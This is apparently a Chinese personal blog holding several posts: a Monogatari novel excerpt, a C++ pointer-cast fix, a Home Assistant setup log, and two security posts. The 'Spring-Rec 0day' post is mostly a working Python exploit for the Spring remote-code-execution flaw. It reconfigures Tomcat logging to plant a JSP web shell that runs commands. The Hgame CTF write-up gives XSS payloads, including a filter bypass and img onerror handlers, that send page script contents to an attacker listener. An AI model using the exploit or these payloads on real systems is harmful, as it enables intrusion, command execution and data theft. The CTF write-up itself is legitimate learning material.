Yunoon


漫天星空,触手可及.

【分享】倾物语 - 第一节

0 条评论 笔记 小记录 Yunoon

前言

决策尽可能多过一遍大脑,今天过马路时看见的是绿灯,便立刻做决定骑过去,却没发现是绿灯的最后一秒,被狠狠地喷了,受到的刺激有点大,回过神来,便想到了物语中小扇和垃圾君的对话。为什么人行横道的红绿灯没有黄灯?

内容

OO1

在讲述我围绕八九寺真宵展开的那场夏日大冒险之前,我想先在这里为大家介绍一位女生。虽然我是这么说,不过她其实并没有参与那场大冒险,甚至跟那次大冒险没有一丝一毫的关联。毕竟我跟她认识的时期,是在夏天早就过去、甚至是几乎能称之为冬天的季节,所以那件事无论如何也是不可能跟她扯上任何关系的。那么,她明明跟我接下来要讲的这个故事没有任何关联,但为什么非要在开头介绍这样一个毫无关系的人物呢?老实说,我没有自信能很好地表达出我想说的意思,怎么说呢,总之她就是会让人产生这种想法的哪一类人。

说白了.那就是在想起某种没有任何解决办法、超出自己能力范围的糟糕透顶的经历时,会莫名其妙地同时联想起来的——或者说就像原本只想着打开衣柜的第二格,结果却在关上的时候由于空气压力,而把第三个也弄开了那样的感觉吧。至于哪个才是准确描述…她这个人的比喻,我就真的无从判断了。

作为一个常见的比喻,人们常说给布丁浇上酱油的话就会变成海胆的味道,现在这种情况就跟那个一样,表面上好像完全没有关系,实际上也真的是毫无关系,可是在回忆的时侯却会被人同时想起来。这究竟应该说是感觉器官的矛盾,还是该说是一种假象呢?如果要勉强形容的话,她就是一个像“不含果汁的碳酸饮料”一样的女人。明明完全不一样,却有着相同的味道,如同合成染色剂和化学调味料那样的——彻头彻尾的假货,简直就像兄赝品的代言入一样的女人。

困惑。

烦恼。

麻烦事。

还有失败、后悔。

跟这些东西一起被收容在同一个抽屉里的高中一年级生,就是她——我的新学妹,忍野扇了。

作为介绍一个比自己年幼的女生的介绍文,这些用词实在是有点过分,不过我想就算她听到我这么形容她也只会一笑置之,所以没有必要太在意,为此感到内疚当然也是毫无意义的事。

顺便一提,把她——小扇介绍给我认识的人就是神原。有个超级可爱的学妹转学到了一年级的哪个班啦——她当时是这么跟我说的。既然是对可爱女生的情报异常了解的神原告诉我的消息,其真实性自然足毋庸置疑的,可是在实际上跟那个女生见面的叫候,我却完全没有产生任何感想的余力。

因为我跟她刚见面,就被她狠狠揍了一顿。

至于我为什么会去见她、又为什么会被她狠揍一顿这个问题,就等我把事情叙述到那个时候(当然还是在有那个机会的情况下)再说吧——在想起有关八九寺的事情时,我就会同时想起小扇说的一句话:

“阿良良木学长,你知不知道十字路口的交通灯,有一瞬间会同时变成红色的?”

就是这样。

“那是什么啊?难道是工作人员在做检修的时候?”

“不是不是,是比那个更频繁的啦——阿良良木学长你每天都应该会看到的。”

“每天都看到……不,我可从来没见过啊。而且要是那种事频繁发生的活,我想到处都会闹出交通事故乱成一团的吧。”

“就是为了避免闹出交通事故,才会出现这种日常性的现象呀。你这个笨蛋,怎么还不明白嘛。不过如果说穿谜底的话,这其实是非常简单的事情呢,阿良良木学长。从纵向的交通灯转红开始,到横向的交通灯转绿为止,总是存在着3秒钟的延迟哦。因为如果同时转灯的话,一些冒失司机的鲁莽行动就很容易引起交通事故了呀。”

“三秒……那根本算不上是瞬间吧。哪里会有人把三秒钟也说成是瞬间的啊。”

“你就別鸡蛋里挑骨头了吧,阿良良木学长,你的性格可真是糟糕透了耶。換句活说,这就是全部都处于静止状态的空白三秒钟啦——反过来说,则并不存在交通灯全部转绿的瞬间。那也许真的只有在工作人员检修的时候才有可能了。如果我是设计者的话,一定会构筑起构造上绝对不会出现那种情况的系统啦。毕竟对任何人来说,安全肯定比危险要好多了嘛.”

“那不是理所当然的嘛,根本不需要你在这里特意强调。”

”不,你就让我在这里强调一下吧,这可是很有趣的事情哦,阿良良木学长。意味着危险的红色信号灯充满了世界的那一时刻,却是比平时更加安全的时刻;反而是意味着安全的绿色信号灯充满了世界的那一瞬间,形成了比世上任何地方都更危险的场所——这样的一个矛盾。危险信号超出某种限度的话,就会构造出安全地带;反过来说,安全信号超出某种限度的话,就会制造出纯粹的无法地带。別说三秒钟,就算是一秒钟也难以生存呢。”

“……对健康有好处的东西很准吃,好吃的东西基本上都很容易长胖——你就是在说这个吧?”

“也对呢,的确是这样。明明脑子很笨,理解倒是挺快的呢,阿良良木学长。”

“能得到你的赞赏实在是无上光荣啊。”

“我可没有称赞你,是在讽刺你耶。在绿灯亮起的时候,很多人都怀着仿佛受到神明庇护似的心情走过斑马线——实际上根本没有那回事呀。那只不过是风险减低了一半而已,只是比全部同时变绿稍微好一点罢了。如果不想遇到危险的话,

我看还是不要过马路的好哦。”

“你要是这么说的话,就算在人行道上走路。也同样有可能被哪个醉鬼司机莫名其妙地撞上来吧。”

“嗯,的确也有那个可能性。不过正因为这样,才应该提出刚才的主张呀。必須由某个人——比如说我,来提出这样的主张。我们必须让人们知道这个世界是何等危险的地方。什么世界很和平,充满了梦想与希望,充满了救赎,人与入之间为了彼此相爱而生存,大家都应该和睦相处,孩子也必须获得幸福之类的——就因为一个个都满怀陶醉地说着这些话,才很容易被別人算计到了呀。那些战地的孩子们.就算没有受过教育也有着更清醒的头脑呢.至少他们对人生更有贪欲。因为他们眼中看到的并不是绿色信号灯,而全部是红色信号灯嘛。”

“在和平的国家里像傻瓜一样生存的权利——我想这应该是每个人都应该享有的吧。毕竟人类已经为此花费了数千年时间才走到这一步的啊。”

“那只是日本独有的想法啦,或者也可以说是这个国家的宗教。不过我可以断言说,日本这个国家在一千年后肯定是不存在的。”

“那对任何一个国家来说也都一样吧。世界上也没有哪个国家能维持同样的体制一千年那么久。这根本不需要去查阅历史书,完全是理所当然的事。”

“对,这是理所当然的。日本也许会灭亡,世界也有可能会灭亡。可是有的人却偏偏不正视这种理所当然的事,却跑去搞什么定期存款的,这才让人觉得可笑嘛。虽然是半哭半笑的笑啦。”

“然后呢?”

“嗯?”

“那么,说到底,小扇你到底是想说些什么嘛?还真是个不得要领的家伙。虽然外表完全不一样,不过在这方面你跟你叔叔还真的很相像啊。”

“你说我像那样的人我也丝毫不觉得高兴,甚至还想控告你损坏名誉呢。不过这次我就大人有大量,把它当作称赞的话来理解吧。没什么,我其实就是在提醒人们要注意。你看人家不是常说嘛,梦想不是用来想像的,而足用来实现的——不过这应该是相反的吧?梦想并不是用来实现的,应该是用来想像的。这才是真理吧?虽然想像自己将来的理想姿态很开心,但是一旦要付诸实现的话,就必须每天都作出平淡无奇的、或者说是徒劳无功的努力——过着一种地狱般的生活。为什么人非得做那种事不可?简直是荒唐到极点了。即使只是单纯的妄想。也可以让人过得很幸福了嘛。”

“跟依靠妄想来获得幸福相比,实现梦想获得幸福的幸福度应该会更高吧?”

“绝对没有那回事。”

“没有吗?”

“没有,没有的啦。比如说任何人都向往过、而且也希望自己将来能实现的——不管是摇滚乐明星也好,运动健将也好,或者是漫画家和大公司老板也无所谓,你只要想像一下这些人的现实生活就很容易明白了。你觉得他们过的是自由自在的生活吗?依我看绝对没有那回事吧。要颐虑到跟雇主之间的关系,还要受到排名和级别的影响,有时要向赞助商点头哈腰,有时又要设法讨得支持者们的欢心,那真是太痛苦了耶。所谓的实现梦想,实际上就意味着体味到自己梦想的乏味之处啊。”

“你的意思是说,越是接近梦想,就越要注意自己跟周围的关系吗?这的确是性格扭曲的人经常说的话。不过也有人因为获得了显赫的身份而过得自由自在吧。”

“你是说那些自由自在地过着生活,在被周围人疏远和讨厌的前提下生存的家伙吗?你难道认为会有人希望成为那样的家伙吗?怀抱着要成为那种家伙的梦想?我看应该正好相反吧。”

“嗯,的确正好相反。”

“所以啊,阿良良木学长。我们必须告诉人们,与其那么辛苦地去拼搏奋斗、在各种客观因素的影响下将快乐梦想转变为痛苦无奈的现实,倒不如坐在电视机的显像管前面一边吃着零食边眺望着那些实现了梦想的人更来得有效率呢。我们必须发挥出狭义心肠。虽然围绕梦想进行想像是非常值得称赞的一件事.但是绝对不可以实现梦想。我们应该把这个观点宣扬出去。”

“……现在使用显像管的电视,都几乎全部被淘汰了啊。虽然它们的图像据说是出乎意料的漂亮。现在流行的都是液晶和等离子之类的了。”

“哈哈,也就是说电视的画面和节日都同样变得浅薄不堪了吗?”

“我并不是在说那种带有批判色彩的话。其中也有很多有趣的节目。”

“你这样为他们辩解,究竟会得到什么人的爱呀?阿良良木学长。就算你是个很好很好的人,也不会有任何人来保护你的哦?反而是你应该保护信号灯。并不是信号灯保护你,而是你来保护信号灯。比如说举起双手,或者挥起小旗子之类的。”

就是这样的感觉。

她自始至终都是这副模样。她本来似乎是想告诉我“十字路口的交通灯全部变红的时间是三秒钟”这个小知识,可是结果却牵扯到了人生、主义,甚至还说起了梦想——那就是名为忍野扇的十五岁女孩子。而我则在回忆起八九寺真宵的时候想起了这样的一个小知识。

跟迷路的少女同时回忆了起来。

前方的信号灯全部都是红色。

在绿灯亮起时过马路,却被车子辗到的——

伴随着在十几年前死去的那个女孩子的回忆,一起想了起来。

伴随着那个夏日的大冒险——以一件极其琐碎的事情作为开端,可是结果却演变为卷入了整个现实的大问题的那个故事,同时回忆了起来。

但是,如果在那个故事结束之后,我对于小扇的杂学知识,对于平时总是把我驳得无言以对的她,提出唯一的一句异议吧。

那就是——

在交通信号灯之中,除了红色和绿色之外,还存在着一盏黄灯。

而这一点,正是她想要提醒人们注意的事情。

结尾

为什么不看物语系列,看,给我看!


关于macOS下C++代码指针地址强转十进制的问题

0 条评论 笔记 小记录 Yunoon

前言

在跑OS的代码时,发现提供的代码放在macOS环境下无法运行,已经将很多地方都做了修改了,最终成功运行,但在显示地址的位置无法正确显示。

正文

  1. 在解决了namespace的问题后,发现还有个报错。

  2. 由于基础的问题,当时没有发现问题的所在,就加了个指针就过了。

  3. 执行的时候发现内存地址显示为16进制。

  4. 通过多次断点,还是没找到问题的所在。

  5. 最终把问题回到步骤1上。
    test33.cpp:45:11: error: cast from pointer to smaller type 'int' loses information

  6. 发现上当前内存长度超过了int的长度限制,因此换成long即可。

  7. 成功解决问题


Spring-Rec 0day漏洞

0 条评论 笔记 RealWord Yunoon

起因经过

这个洞在29号漏出后,我反正是摆烂的,没怎么动手。
后面在31号才拿到环境,然后利用作者写的文章进行复现。

  1. 简单的idea Spring项目环境搭建,坑点是有几个依赖包没有,以及JDK17不支持漏洞。
  2. 实现原理:通过Bean对象的生成中有缓存class方式,然后通过这个利用点,构造log日志调用链,从而达到rec的目的。
  3. exp
    from time import sleep
    
    import requests
    
    test = ["class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bfuck%7Di",
            "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/yunoon/Downloads/spring"
            "-rce-war-fa55cb4b11516784574d06948d53ac90f8430f50/out/artifacts/stupidRumor_war_exploded",
            "class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp",
            "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="]
    
    url = "http://localhost:8084/stupidRumor_war_exploded/index?"
    
    url2 = "http://localhost:8084/stupidRumor_war_exploded/index?"
    for i in range(5):
        url2 = url2 + "&" + test[i]
    print(url2)
    res = requests.get(url=url2)
    print(res.status_code)
    
    header = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 "
                      "Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        'fuck': '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
        'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Upgrade-Insecure-Requests': "1",
        'Sec-Fetch-Dest': "document",
        'Sec-Fetch-Mode': "navigate",
        'Sec-Fetch-Site': "none",
        'Sec-Fetch-User': "?1",
    }
    #
    url1 = "http://localhost:8084/stupidRumor_war_exploded/fuckUUUU"
    res = requests.get(url=url1, headers=header)
    print(res.status_code)
    
    
  4. 后面后空会分析原理的,咕咕咕。

Home Assistant环境搭建

0 条评论 笔记 小记录 Yunoon

起因经过(概要

很久以前就想做智能家居整合了,但一直没找到时间,今天得空。
第一次尝试,开始是打算直接用pip装的,发现windows的环境会报c++ 14缺失 Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools最终的解决方案是,通过博客等方式了解信息,最终从下载下来一份VisualCppBuildTools_full,将这个安装后就可以使用了。(其实官网的也可以,但要在线下载,国内网络环境问题,这个问题在第二次尝试的时候解决的。)最终所有依赖包安装完毕后,发现不支持windows原生运行XD。

第二次尝试,在官网下载了安装镜像,但国内的环境让docker拉去镜像变得异常得慢,下了好几个小时都还没好,后面破防了,没有用这个方法。开始尝试第三种方法。
第三次尝试,直接拉docker容器发现还是拉的docker hub的镜像,通过更改为国内镜像解决问题。,这个可以,直接跑通,但后续还是有网络方面的问题。

最后对网络方面的问题就行总结一下,windows环境下,由于我用的是clash,无法对未配置的解析域名进行代理,从而导致的网络问题。后面在查阅clash官方文档发现可以用TAP模式(老版本没TUN模式),最后解决。在给VMware开了net模式后,可以直接走同一张网卡的流量,第二次尝试的问题就解决了。再来说第三次尝试的问题,虽然跑起来了,但是装hacs的时候发现还是出现代理问题,主要是GitHub的代理问题,我在有clash的设备上开启了允许局域网连接后,设置了git代理就最终解决了。目前已经可以把米家生态接入HomeKit了。

参考链接:
clash TAP配置:https://docs.cfw.lbyczf.com/contents/tap.html


Hgame 2022 WP Week2

0 条评论 笔记 CTF WP Yunoon

webpack-engine

  1. 这题当时没仔细做,发现挺简单的,和前面的JS题目一样分析源码就行。
  2. 在源码中可以发现有注解
  3. 解码后发现是json字符串

    这里可以发现有base64加密
  4. 两次base64解码就可以得到flag

    flag: hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}

At0m的留言板

  1. 这题真的给我做麻了,熬了个大通宵,临门一脚还是没弄出来,在大师傅的指导下整了出来。
  2. 主要有着这些知识点:
    1. XSS执行,这里有script的过滤可以用大小写绕过。
    2. <img src="" onerror="alert(1)"> 通过img标签来执行异常处理。
    3. 在执行语句的前提下,发送HTTP请求。
    4. python SimpleHTTPServer模块来做日志记录。
  3. 可以根据题目给的提示获取到模版文件

  4. 这里就犯了个失误,导致卡了很久,以为script中的auth0r和flag就是默认的变量名,导致后续做请求时,如果出现未命名变量时会报错,导致无法发送请求。
  5. 然后访问公众号,进行留言,可以看到,输入的内容会出现在content中。

  6. 尝试XSS,发现script被拦了。
  7. 然后修改script大小写,发现可以绕过,但被识别为了文本内容。
  8. 在本地测试发现可以通过img/input标签的onerror报错输入执行js语句。
    <img src="" onerror="document.getElementsByClassName('content')[0].innerText =flag">

    <input value="" type=image src onerror="document.getElementsByClassName('content')[0].innerText =flag" type="text">

  9. 当这个时候找不到变量名称,所以就会报错,显示为空。

  10. 虽然无法通过这种方法获取flag,但在onerror能够执行js语句时,还有很多能做的,这里就开始下一阶段:通过发送http请求,查看http请求中的日志,获取flag。

  11. 先在公网服务器中起一个监听服务

  12. 在微信公众号中输入payload,监听服务器中的请求。

  13. payload:<img src="" onerror="var flag = window.flag; const Http = new XMLHttpRequest();const url='http://[IP]:10020/'+flag;Http.open('GET', url);Http.send();Http.onreadystatechange = (e) => {console.log(Http.responseText)}">

  14. 可以发现该变量确实不存在

  15. 当时就想着如何获取变量名,从而得到flag,但一直没找到这类函数,属于是知识面窄了。

  16. 然后通过和大师傅的交流,大师傅提供了一个思路,通过getElementsByTagName这个函数获取到script的内容,这样就可以获取到flag了。


    1. 原理是这样的,虽然我们无法获取到flag的名字,但该页面却依旧会按照模版文件那样,有script的内容。
    2. 通过过滤script的内容,从而获取到flag。
  17. 最终形成的payload就是:<img src="" onerror="var flags =document.getElementsByTagName('sCriPt')[0].innerText; var Http = new XMLHttpRequest();const url='http://[IP]:10020/'+flags;Http.open('get', url);Http.send('flag='+flags);Http.onreadystatechange = (e) => {console.log(Http.responseText)}">

  18. 进行URL解码就行了

  19. flag:hgame{Xs5_1s_so_int3Restin9!Var_is_0uT_of_d4te}